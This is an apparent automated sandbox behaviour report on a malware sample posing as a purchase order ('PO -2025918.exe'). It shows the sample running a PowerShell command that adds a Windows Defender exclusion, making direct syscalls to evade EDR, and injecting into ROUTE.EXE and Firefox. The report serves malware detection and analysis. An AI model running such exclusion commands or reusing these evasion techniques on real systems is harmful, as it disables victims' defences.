                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B90AD0 mov eax, dword ptr fs:[00000030h]4_2_01B90AD0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC4AD0 mov eax, dword ptr fs:[00000030h]4_2_01BC4AD0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC4AD0 mov eax, dword ptr fs:[00000030h]4_2_01BC4AD0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE6ACC mov eax, dword ptr fs:[00000030h]4_2_01BE6ACC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE6ACC mov eax, dword ptr fs:[00000030h]4_2_01BE6ACC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BE6ACC mov eax, dword ptr fs:[00000030h]4_2_01BE6ACC
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB4A35 mov eax, dword ptr fs:[00000030h]4_2_01BB4A35
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB4A35 mov eax, dword ptr fs:[00000030h]4_2_01BB4A35
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBEA2E mov eax, dword ptr fs:[00000030h]4_2_01BBEA2E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCCA24 mov eax, dword ptr fs:[00000030h]4_2_01BCCA24
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3EA60 mov eax, dword ptr fs:[00000030h]4_2_01C3EA60
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0CA72 mov eax, dword ptr fs:[00000030h]4_2_01C0CA72
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C0CA72 mov eax, dword ptr fs:[00000030h]4_2_01C0CA72
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1CA11 mov eax, dword ptr fs:[00000030h]4_2_01C1CA11
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCCA6F mov eax, dword ptr fs:[00000030h]4_2_01BCCA6F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCCA6F mov eax, dword ptr fs:[00000030h]4_2_01BCCA6F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCCA6F mov eax, dword ptr fs:[00000030h]4_2_01BCCA6F
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"Jump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\ROUTE.EXEThread register set: target process: 2892Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\ROUTE.EXEThread APC queued: target process: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"Jump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Users\user\Desktop\PO -2025918.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
